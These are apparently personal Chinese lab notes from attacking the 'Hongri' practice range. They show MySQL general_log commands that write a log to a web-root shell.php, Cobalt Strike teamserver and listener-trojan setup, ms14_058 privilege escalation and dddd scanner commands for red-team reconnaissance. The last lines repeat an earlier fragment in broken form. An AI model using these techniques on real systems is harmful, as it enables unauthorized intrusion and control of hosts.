8月6日
红日靶场打靶继续
SHOW VARIABLES #用于显示服务器运行时的各种系统变量的当前设置。这些变量可以控制服务器的行为
在 MySQL 中,general_log
和 general_log_file
是两个与“general”相关的系统变量,它们控制着服务器是否启用一般查询日志以及日志文件的名称。 general_log_file
中包含日志存储路径。
SET GLOBAL general_log='on'; #开启日志读写功能
show variables like '%general%'; #查找日志相关配置
set global general_log_file ='C:\\phpStudy\\WWW\\shell.php' ; #设置日志存储位置。
cs搭建与木马生成
-----文件结构
..|cs
.....|Server
.....|Client
--------------
进入Server
chmod +x teamserver
chmod +x TeamServerImage
------为两个文件赋予权限
vim teamserver #去这个里面修改端口
bash teamserver 《kali ip》 kali的密码
---------------
进入Client
bash cobaltstrike-client.cmd
进入UI界面
host和port分别按照kali ip和自己修改的端口号填写,password就是kali密码,其他随便填。
使用过程采用攻击红日靶场的。
大致样子。点击cobalt strike选listeners,选择监听器。add添加。
http host点击旁边的+直接添加。端口自己改,不要冲突就行了。save之后选择payload中的可执行程序。创建监听器木马。
木马上传到我们要攻击的主机。
蚁剑运行。
监听成功。
表示当前用户是 “nt authority\system”,这是 Windows 系统中的一个内置账户,拥有管理员级别的权限。
shell systeminfo #查看系统信息
如果不是system的管理员权限的话
只打了四个补丁,利用ms14_058提权。采用的cs的插件。
(待明天下载cs插件,有更多的功能施展)
dddd工具的使用
最简使用
扫描IP
dddd -t 192.168.0.1
扫描网段
dddd -t 192.168.0.1/24
dddd -t 192.168.0.0-192.168.0.12
扫描网站
dddd -t http://test.com
输出文件
dddd存在三种文件输出
txt格式输出(默认选择)
html格式(默认选择)
审计日志(可选)
所有结果默认输出在 result.txt,可通过-o参数更改输出文件,-ot参数更改输出格式(json),默认为text。
默认HTML格式漏洞输出为 当前时间戳.html,可通过-ho参数更改输出文件。
-a 参数开启审计日志功能,日志保存在 audit.log,记录详细扫描行为。
扫描可以随时终止,当有指纹识别、漏扫结果等输出时,会实时保存在文件内。
应用场景命令速查
红队外网 (Hunter)
dddd -t 'icp.name="xxxx有限公司"' -hunter -oip
红队外网 (Hunter查询备案,Fofa补充端口)高效梳理资产
dddd -t 'icp.name="xxxx有限公司"' -hunter -fofa -oip
红队外网 (本机枚举子域名)
dddd -t xxx.com -sd
红队内网
./dddd -t 172.16.100.0/24
安服测试/敏感环境 (开启审计日志,便于事后甩锅)
./dddd -t 172.16.100.1 -a
仅指纹识别
./dddd -t http://www.xxx.com -npoc
./dddd -t 172.16.100.11 -npoc
./dddd -t 172.16.120.11:3307 -npoc
d -t 172.16.100.1 -a
仅指纹识别
./dddd -t http://www.xxx.com -npoc
./dddd -t 172.16.100.11 -npoc
./dddd -t 172.16.120.11:3307 -npoc